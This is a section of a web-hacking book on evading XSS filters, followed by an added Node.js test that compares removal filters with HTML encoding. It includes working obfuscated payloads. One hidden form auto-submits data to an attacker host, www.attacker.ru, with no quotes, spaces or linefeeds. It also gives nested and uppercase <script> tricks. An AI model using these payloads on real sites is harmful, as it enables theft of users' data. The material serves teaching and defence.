Solving Problems

Sometimes an attacker encounters a situation in which a particular attack method cannot be applied directly. The most common case is the filtering of apostrophes and quotation marks from received and sent data.

If these characters only enclose the values of tag attributes, style properties, and so on, the same expression can often be rewritten without them, as long as the value itself contains no spaces.

If a string literal is needed in JavaScript code, the attacker can use the String.fromCharCode() method instead. It takes a sequence of integers and returns the string made of the characters with those character codes (ASCII codes here; 72, 101, 108, 108, 111 spell "Hello"), as in this example:

    <script>
    alert(String.fromCharCode(72, 101, 108, 108, 111));
    </script>

This is how the attacker can avoid using quotation marks in JavaScript code.

Outside JavaScript code, spaces can often be removed from the markup without affecting its functionality. Inside JavaScript code, a space can be replaced with an empty comment, /**/.

If linefeed and carriage return characters are filtered, the attacker can write the JavaScript code on a single line, because a linefeed carries no syntactic meaning there as long as every statement is terminated with a semicolon. A linefeed can always be replaced with a space, and a space can be replaced with the /**/ sequence.

Consider a more complex example: JavaScript code that submits data in a form to an iframe contained in a hidden layer. The goal is a version of this code that contains no linefeeds, spaces, or quotation marks:

    <div style=visibility:hidden;position:absolute;width:0;height:0;><iframe name=if1></iframe></div>
    <form name=f1 method=POST target=if1 action=http://www.attacker.ru/attacker.php><input type=hidden name=data></form>
    <script>
    test=String.fromCharCode(72,101,108,108,111);
    document.f1.data.value=test;
    document.f1.submit();
    </script>

Before sending, remove all linefeed characters from this code. Also remove the spaces that precede the JavaScript code, those in the form declaration, and those in the hidden fields.

You can do without spaces altogether and rewrite this code on one line. It loses readability but keeps its functionality (the two long String.fromCharCode() sequences encode the hidden <div> with its iframe and the <form> declaration from the previous listing; the apostrophes around the field value, code 39, are generated at run time rather than typed):

    <script>test=String.fromCharCode(72,101,108,108,111);document.open();document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,118,105,115,105,98,105,108,105,116,121,58,104,105,100,100,101,110,59,112,111,115,105,116,105,111,110,58,97,98,115,111,108,117,116,101,59,119,105,100,116,104,58,48,59,104,101,105,103,104,116,58,48,59,62,60,105,102,114,97,109,101,32,110,97,109,101,61,105,102,49,62,60,47,105,102,114,97,109,101,62,60,47,100,105,118,62));document.write(String.fromCharCode(60,102,111,114,109,32,110,97,109,101,61,102,49,32,109,101,116,104,111,100,61,80,79,83,84,32,116,97,114,103,101,116,61,105,102,49,32,97,99,116,105,111,110,61,104,116,116,112,58,47,47,119,119,119,46,97,116,97,99,107,101,114,46,114,117,47,97,116,97,99,107,101,114,46,112,104,112,62,60,105,110,112,117,116,32,116,121,112,101,61,104,105,100,100,101,110,32,110,97,109,101,61,100,97,116,97,32,118,97,108,117,101,61,39)+test+String.fromCharCode(39,62,60,47,102,111,114,109,62));document.close();document.f1.submit();</script>

This code sends data in a form to an iframe contained in a hidden layer. It isn't readable, but it works correctly, and it lets the attacker circumvent filtering of linefeeds, quotation marks, and spaces.

This example shows that it is possible to create a script that exploits an XSS vulnerability and passes many checks.

In addition, the attacker is likely to check for the most common filtering mistakes. For example, if a message is filtered by removing the <script> keyword, the attacker can try writing it in uppercase letters to get past a case-sensitive filter. For another example, if the <script> keyword is deleted only once, the attacker can use a construction such as <scri<script>pt>: after the inner <script> is deleted, a correct tag remains in the message.

In other words, the workaround varies with the filtering algorithm in use.
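As an added example (not code from the book), the following JavaScript runs the removal-based filters this section describes against the evasions it lists, beside the HTML output encoding that defeats all of them; the filter functions, sample strings and report layout are this example's own constructs:

```javascript
// Added example, not from the book: removal-based filters run against the
// evasions this section lists, beside the encoding that neutralises them. Node.js.

// Filter A: strip apostrophes and quotation marks from the data.
function stripQuotes(input) {
  return input.replace(/["']/g, "");
}

// Filter B: delete the literal <script> keyword once and case-sensitively
// (the two filtration mistakes the section points out).
function removeScriptOnce(input) {
  return input.replace("<script>", "");
}

// Mitigation: HTML-encode the metacharacters at output time so the browser
// renders the data as text instead of parsing it as markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function htmlEncode(input) {
  return input.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// True when a string still contains an opening script tag in any letter case.
function containsScriptTag(s) {
  return /<script\b/i.test(s);
}

// Constructed inputs mirroring the section's examples.
const SAMPLES = {
  quoted: "<script>alert('Hello')</script>",      // Filter A does break this one
  noQuotes: "<script>alert(String.fromCharCode(72,101,108,108,111))</script>",
  nested: "<scri<script>pt>",                     // one deletion leaves <script>
  uppercase: "<SCRIPT>alert(1)</SCRIPT>",         // case-sensitive match never fires
};

// Runs every sample through each filter and through encoding, recording whether
// Filter A changed anything and whether a script tag survives each treatment.
function evaluate() {
  const report = {};
  for (const [name, raw] of Object.entries(SAMPLES)) {
    report[name] = {
      quoteFilterNoEffect: stripQuotes(raw) === raw,
      afterScriptFilter: removeScriptOnce(raw),
      survivesScriptFilter: containsScriptTag(removeScriptOnce(raw)),
      survivesEncoding: containsScriptTag(htmlEncode(raw)),
    };
  }
  return report;
}
console.table(evaluate());
```

Run with node: the table shows Filter A leaving the quote-free payload untouched, Filter B letting the nested and uppercase forms through, and encoding leaving no executable tag in any case.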



Hacker Web Exploitation Uncovered
ISBN: 1931769494
EAN: N/A
Year: 2005
Pages: 77